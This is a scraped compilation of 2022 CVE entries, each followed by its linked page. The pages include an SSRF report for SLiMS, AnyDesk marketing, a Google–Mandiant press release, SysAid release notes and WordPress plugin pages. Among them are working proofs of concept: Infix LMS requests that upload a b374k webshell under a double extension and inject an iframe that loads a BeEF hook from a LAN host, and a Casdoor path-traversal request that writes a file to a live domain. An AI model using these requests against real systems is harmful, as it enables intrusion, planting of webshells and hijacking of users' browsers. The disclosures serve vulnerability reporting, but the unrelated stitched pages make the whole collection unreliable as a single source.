SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.

**The bug**  
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php

**Reproduce**  
Steps to reproduce the behavior:

1.  Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
2.  choose between marc sru or 23950sru
3.  type in something what you want in the search bar
4.  set burpsuite intercept on
5.  change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
6.  forward the request
7.  or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

**Screenshots**  
Normal requests

Tampered and SSRF trigger(netcat)

Tampered and SSRF trigger(toptal.com)

**Versions**

*   OS: MacOS Mojave 10.14.6
*   Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86\_64)
*   Slims Version: slims9\_bulian-9.4.2

CVE-2022-38292: [Security Bugs]  Server Side Request Forgery · Issue #158 · slims/slims9_bulian

An issue was discovered in AnyDesk before 6.2.6 and 6.3.x before 6.3.3. An unnecessarily open listening port on a machine in the LAN of an attacker, opened by the Anydesk Windows client when using the tunneling feature, allows the attacker unauthorized access to the local machine's AnyDesk tunneling protocol stack (and also to any remote destination machine software that is listening to the AnyDesk tunneled port).

*   Windows
    
*   macOS
    
*   Android
    
*   iOS
    
*   Linux
    
*   FreeBSD
    
*   Raspberry Pi
    
*   Chrome OS
    

Discover AnyDesk for Windows

*   Lightly designed.
*   Smooth Remote Desktop connections.
*   Easy Online Remote Collaboration.
*   Compatible with earlier Windows versions.
*   Always free updates.

Download Now

**Highlights**

**Dynamic performance**

Establish seamless Remote Desktop connections in Windows and offer excellent Remote Support to your customers with the help of thought-through features.

Subscribe Now

**Flexibility**

Customize AnyDesk with your own brand and logo to highlight your corporate identity. Easily administrate all settings and configurations in Windows.

Subscribe Now

**Compatibility**

AnyDesk is not only compatible with Windows 10 and older. You can also establish connections with many other operating systems and their various versions, including iOS, macOS, Linux and Android.

Subscribe Now

Tutorial: An easy installation guide

**AnyDesk on any platform**

  

 To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

**Do you need more information? Our online Help Center provides all the answers.**

Help Center

**Interested in the most relevant changes in our latest AnyDesk version?**

Learn More

**Trusted by over 100,000 customers**

**More features**

**Administration**

AnyDesk facilitates managing your Remote Desktop contacts and connections. You can administrate all settings and configurations in Windows with Group Policies. Focus on your projects rather than their administration.

Learn More

**Security**

Thanks to TLS 1.2 encryption technology and incessant verification of connections, AnyDesk ensures end-to-end privacy and protects your data. Only authorized desks can demand Remote Access to your device via AnyDesk.

Learn More

**On-Premises**

You can establish an autonomous, private network that fully shields your data while operating Windows Remote Desktops with AnyDesk On-Premises. All information remains within your own network.

Learn More

CVE-2021-44425: Remote Desktop Software for Windows – AnyDesk

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

The threat-intelligence and cyberdefense company company will join Google Cloud and retain its brand name.

**MOUNTAIN VIEW, Calif., and RESTON, Va., Sept. 12, 2022 /PRNewswire/** — Google LLC today announced the completion of its acquisition of Mandiant Inc. (NASDAQ: MNDT), a recognized leader in dynamic cyberdefense, threat intelligence and incident-response services. Mandiant will join Google Cloud and retain the Mandiant brand.

Google and Mandiant share a long commitment to industry-leading security. Over the past two decades, Google has innovated to build some of the most secure computing systems in the world. Google Cloud customers and partners benefit from these pioneering security capabilities, including world-class threat intelligence, zero trust architecture, and planet-scale analytics for security operations. Mandiant, which is known for delivering unparalleled frontline expertise and industry-leading threat intelligence, is a proven first responder to the world's largest cybersecurity incidents. Mandiant's services, delivered by their team of security and intelligence individuals spread across 22 countries, are widely recognized for helping top enterprises and organizations prepare for and react to cybersecurity incidents.

With this acquisition, Google Cloud and Mandiant will deliver an end-to-end security operations suite with even greater capabilities to support customers across their cloud and on-premise environments.

"The completion of this acquisition will enable us to deliver a comprehensive and best-in-class cybersecurity solution," said Thomas Kurian, CEO of Google Cloud. "We believe this acquisition creates incredible value for our customers and the security industry at large. Together, Google Cloud and Mandiant will help reinvent how organizations protect themselves, as well as detect and respond to threats."

Organizations today are facing cybersecurity challenges that have accelerated in frequency, severity and diversity, creating a global security imperative. Enterprises need to be able to detect and respond to malicious actors quickly, with actionable threat intelligence to continually protect their organizations against new attacks.

"Mandiant is driven by a mission to make every organization secure from cyber threats and confident in their readiness," said Kevin Mandia, CEO, Mandiant. "Combining our 18 years of threat intelligence and incident response experience with Google Cloud's security expertise presents an incredible opportunity to deliver with the speed and scale that the security industry needs."

Hear from others on the impact of this acquisition:

*   "The power of stronger partnerships across the cybersecurity ecosystem is critical to driving value for clients and protecting industries around the globe. The combination of Google Cloud and Mandiant and their commitment to multi-cloud will further support increased collaboration, driving innovation across the cybersecurity industry and augmenting threat research capabilities. We look forward to working with them on this mission." — Paolo Dal Cin, Global Lead, Accenture Security
*   "Google's acquisition of Mandiant, a leader in threat intelligence, security advisory, consulting and incident response services will allow Google Cloud to deliver an end-to-end security operations suite with even greater capabilities and services to support customers in their security transformation across cloud and on-premise environments." — Craig Robinson, Research VP, Security Services, IDC
*   "Bringing together Mandiant and Google Cloud, two long-time cybersecurity leaders, will advance how companies identify and defend against threats. We look forward to the impact of this acquisition, both for the security industry and the protection of our customers." — Andy Schworer, Director, Cyber Defense Engineering, Uber

For more information, see the Google Cloud blog and Mandiant blog.

**About Google  
**Google's mission is to organize the world's information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become one of the most widely known companies in the world. Google is a subsidiary of Alphabet Inc.

**About Google Cloud  
**Google Cloud accelerates every organization's ability to digitally transform its business. We deliver enterprise-grade solutions that leverage Google's cutting-edge technology — all on the cleanest cloud in the industry. Customers in more than 200 countries and territories turn to Google Cloud as their trusted partner to enable growth and solve their most critical business problems.

**About Mandiant, Inc.  
**Since 2004, Mandiant has been a trusted partner to security-conscious organizations. Effective security is based on the right combination of expertise, intelligence, and adaptive technology, and the Mandiant Advantage SaaS platform scales decades of frontline experience and industry-leading threat intelligence to deliver a range of dynamic cyber defense solutions. Mandiant's approach helps organizations develop more effective and efficient cyber security programs and instills confidence in their readiness to defend against and respond to cyber threats.

**Forward-Looking Statements  
**This release includes forward-looking statements within the meaning of Section 27A of the Securities Act of 1933 and Section 21E of the Securities Exchange Act of 1934. These forward-looking statements involve certain risks and uncertainties that could cause actual results to differ materially from those indicated in such forward-looking statements, including but not limited to the ability of Google to successfully integrate Mandiant's operations, product lines and technology; the ability of Google to implement its plans, forecasts and other expectations with respect to Mandiant's business after the completion of the transaction and realize additional opportunities for growth and innovation; and the other risks and important factors contained and identified in Alphabet's filings with the Securities and Exchange Commission, any of which could cause actual results to differ materially from the forward-looking statements. The forward-looking statements included in this release are made only as of the date hereof. Google and Alphabet undertake no obligation to update the forward-looking statements to reflect subsequent events or circumstances.

SOURCE: Google Inc.

Google Completes Acquisition of Mandiant

SysAid Help Desk before 22.1.65 allows XSS via the Asset Dashboard, aka FR# 67262.

*   Updated on 28 Jul 2022
*   5 Minutes to read

*   Print
    
*   Share
    
*   Dark
    
    Light
    

**GA June 6, 2022****Feature Requests**

**FR#**

**Description**

**Module/Tool**

52960

Reports generated in Excel are now exported in XLSX format for better experience and support of extra-large files.

Analytics

54161

Improved Patch Management implementation mechanism to resolve Apache HTTPD vulnerability errors. (This also covers FR# 58032.)

Patch Management

52260

Admins can map CI Fields to the Owner Group field when importing CIs into SysAid’s CMDB.

CMDB

64356

Created a new ‘$ReopenSR-requires\_login’ tag for ticket notifications.  
Using this tag will verify that the user who clicked the link is logged in to SysAid and update the SR as needed.

Help Desk

51918

A new check box in the Escalation Rules form allows admins to set reminders on action items.  
Configuration requires using custom user fields and action items dependencies.

Help Desk

53457

Admins can filter columns in the routing rules list by specific values.

Help Desk

60457

We added two new variable tags that can be added to ticket notifications in both the recipient field and the body of the notification:

*   $RequestUserManager – The direct manager of the ticket’s request user.
*   $AIAssigneeDirectManager – The direct manager of the user assigned to the action item.

Help Desk

66409

Improved performance in loading the Self-Service Portal in different sections: Catalogue items, FAQs, new ticket and category display and drop downs.  
This addresses bugs 65724, 60463, and 54442 as well.

Self-Service Portal

53656

Admins can define how many tickets are displayed in the Self-Service Portal scoreboard page when the end-user clicks Show All.

Self-Service Portal

60979

Improved performance around the loading of tickets in the scoreboard for a better customer experience.

Self-Service Portal

66129

Added validation when end-users self-registered for the Self-Service Portal.

Self-Service Portal

67236

Removed capability to import and export knowledge base articles to and from the SysAid Community in preparation for the relaunch of the community.

Knowledge Base

65579

Tightened security around potential XSS vulnerabilities (also covers bug #66542).

Security

65584

Tightened security around changing password capability on the My Settings page.

Security

67238

Removed or restricted access to certain vulnerable files on the SysAid server. This also covers FR #67237

Security

67241

Tightened security against potential XSS (cross-site scripting) attacks in the Password Services module.

Security

67258

Tightened security against potential XSS (cross-site scripting) attacks via the Linked SRs field.

Security

67262

Tightened security against potential XSS (cross-site scripting) attacks in the Asset Dashboard.

Security

66686

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here.

Security

52825

Admins can now sort the Asset list by the Last Access Time column in ascending or descending order.

Asset Management

64635

Changes were made to the Microsoft Azure interface. We updated the online help for the O365 integration to include the needed configuration changes.

Third-Party Integration

65264

Updated our documentation for setting up the OneLogin SSO integration in response to changes in OneLogin’s requirements.

Third-Party Integration

61365

Tightened security around access to LDAP Imported users via the API. This covers CVE-2021-36721.

Security

66686 (\*)

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here. This covers CVE-2021-22796.

Security

66692

Tightened security around access for non-admin users. This covers CVE-2022-22798.

Security

67656

Tightened security against potential Cross-Site Scripting (XSS) attacks. This covers CVE-2022-23165. This also covers FR #5209.

Security

67655

Tightened security around access to vulnerable files in the SysAid server.  
This covers CVE-2022-23166.

Security

66687

Resolved vulnerabilities related to Apache Tomcat.

Security

**Bug Fixes**

**Bug #**

**Description**

**Module/Tool**

61655

Fixed a bug that caused an empty list page to open when admins clicked on the Highest Values graph in the Dashboard.

Analytics

64779

Fixed a bug that caused SysAid to create duplicate asset records when the asset ID generated by the SysAid agent consisted of only one digit.

Asset Management

57188

Fixed a bug that prevented SysAid from displaying changes to an admin’s Company, Location, and Department fields on an asset that was automatically assigned to that admin.

Asset Management

66131

Fixed a bug that generated errors when an admin attempted to import Chromebook devices that were missing an Auto-update expiration date.

Asset Management

64125

Fixed a bug that caused a timeout when admins tried exporting the list of assets that were using a software product.

Asset Management

52731

Fixed a bug that prevented SysAid from properly displaying graphs in the dashboard when the dashboard headers contained certain special characters.

Dashboard

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

66132

Fixed a bug that caused SysAid to ignore certain user parameters in routing rules on tickets generated via email, when email integration was configured with OAuth 2.0 protocol.

Email Integration

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

65211

Fixed a bug that sometimes prevented admins from changing the order of routing rules.

Help Desk

65409

Fixed a bug that caused escalation rules to run outside of the defined operating hours.

Help Desk

66388

Fixed a bug that sometimes prevented users from logging in to the Mobile solution after they had logged out.

Mobile

65757

Fixed a bug that prevented the Self-Service Portal from displaying the profile menu when it was opened via the hotkey.

Self Service Portal

64572

Fixed a bug that caused the agent hotkey to open the now deprecated End-User Portal when the Self-Service Portal was disabled in that account.

Self Service Portal

65199

Fixed a bug that prevented end users from automatically downloading the ticket attachment after login to the Self-Service Portal, when they click on the ‘${LinkToAttachments}’ tag in a ticket email notification.

Self Service Portal

65353

Fixed a bug that sometimes caused content generated by category pointers from appearing in the service catalog.

Self Service Portal

65363

Fixed a bug that sometimes generated an error when admins tried to populate data in a workflow template with many action items.

Service Desk

63121

Fixed a bug that prevented the Self-Service Portal’s Scoreboard from displaying any items in the full Workflow Actions list when one of the workflow actions on the list had been deleted from its template.

Service Desk

64086

Fixed a bug that prevented SysAid from sending emails with attachments larger than 3MB when email integration was configured for O365 using the Oauth 2.0 protocol.

Third-Party Integration

66123

Fixed a bug that caused the ‘Can be assigned to service record’ setting to be reverted to its default for Azure-imported user groups when SysAid synced with Azure.

Third-Party Integration

66620

Fixed a bug that prevented Azure-imported admins from seeing tickets assigned to their group.

Third-Party Integration

65590

Added the capability to remove configurations in the Multi SSO Connector setup page, along with other minor UI updates.

Third-Party Integration

65802

Fixed a bug that prevented admins from changing the HTML displayed in their login screen for the SSO Connector add-on.

Third-Party Integration

57227

Fixed a bug that caused users who were demoted from admin to end user to maintain some of their original admin permissions.

User Management

Was this article helpful?

CVE-2022-40325: 22.1.65 Release Notes - On-Premises Releases

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

Unauthenticated Event Deletion vulnerability in Totalsoft Event Calendar – Calendar plugin <= 1.4.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Event Calendar is a flexible calendar plugin that allows you to connect to your database and show up your event days on a view. Calendar can render a Day, Week, Month and Resource calendar view. The also provides an interface for manipulating and formatting dates and times. Each event box has a link to the original event you defined in your calendar.

*   Event Calendar Premium
*   All Calendar Demo Types
*   Event Calendar FAQ
*   Event Calendar User Manual
*   Support Forum

**Features**

*   Plugin for create a calendar with events.
*   Intuitive event labels.
*   Easy to customize.
*   Use as a date picker or a full fledged calendar.
*   10 free themes with the option of select data ranges, mark events and others (4 versions of the event calendar type, 2 versions of the simple type, 2 versions of the flexible type and 2 versions of the timeline type)
*   You can easily list your events on wherever you want on your page via shortcodes.
*   Each event box has a link to the original event you defined in your calendar.
*   Allows you to set the most appropriate navigation arrows, which will suit the best for your web site.
*   The ability to display multiple events for a single day.
*   Plugin lets you change the color and set it to the colors of your site.
*   You can change the start and end date of the event.
*   You can change the start and end time of events.
*   You can customize the calendar color, font size and font family.
*   The ability to change the color of the arrow and background color.
*   Each species has a unique customizable settings.
*   Add an unlimited number of events in one calendar. As you have already created a number of events, you can add via the shortcodes on your page as you need.
*   Each calendar can be inserted in a page, post or widget shortcode.
*   You can add photos to the events (all types)
*   Total Calendar, Timeline, Crazy, Schedule and Full Year types each event has its own color.
*   Recurring events
*   Possibility to preview the theme in calendar before putting it on the page.

**Premium version adds**

*   3 beautiful customizable themes
*   Crazy Calendar Theme
*   Schedule Theme
*   Full Year Calendar Theme
*   **Recurring events** – Daily, Weekly, Monthly, Yearly
*   **WeekDay Start** – Can select that day, which must be the first in the week.
*   **Weekday** – Ability to select the style of calendar week.
*   **Todays numbers Color** – Can choose the date color, that will be displayed.
*   **Icon** – Possibility select the right and the left icons, which are, for change the months by sequence.
*   **Color** – The plugin allows to change the color and enter it in the colors of your site.
*   **Font** – The plugin allows to change the color of the date, font size and font family.
*   This opens up new useful functions and new possibilities.

**In addition to the features mentioned above, there are many other functions inside the plugin. You get the advantage of an intuitive user interface, that makes the plugin operation easy, easy to understand the calendar options, as well as many hooks and filters to control the output.**

**Main features of Event.**

*   **Event Title** – You can give a name for event.
*   **Calendar Name** – Choose that version of themes, in which you want to see the Events.
*   **Start Date** – You Can select the start of the event (To display events in the calendar if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **End Date** – You Can select the finish date of the event (To display events if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **Event URL** – You can set external URL, which should be included in the event.
*   Open in new tab – Choose, by clicking on the link should open in new tab or not.
*   **Start Time (Required field)** – Can select the event start time (To display events in the calendar if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **End Time (Required field)** – Can select the event end time (To display events if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **Event color** – Select that color, which you want to see for your event, which shows in the calendar (Event Color option is only for Event Calendar Type.).
*   **Description** – You can give a description for event.
*   **Event Image/Video** – You can give a Image and Video(YouTube and Vimeo) for event. Event Image and Video option is available for all types.

**Insert plugin to the WordPress page, post, widget** – Every calendar could be inserted into a page, post or widget with shortcode.

**Plugin works in Chrome, Safari, Opera, Firefox, Internet Explorer** – Use your calendar with all the popular browsers.

**Navigation Arrow** – Plugin allows you to get the most suitable navigation arrows that fit best for your website.

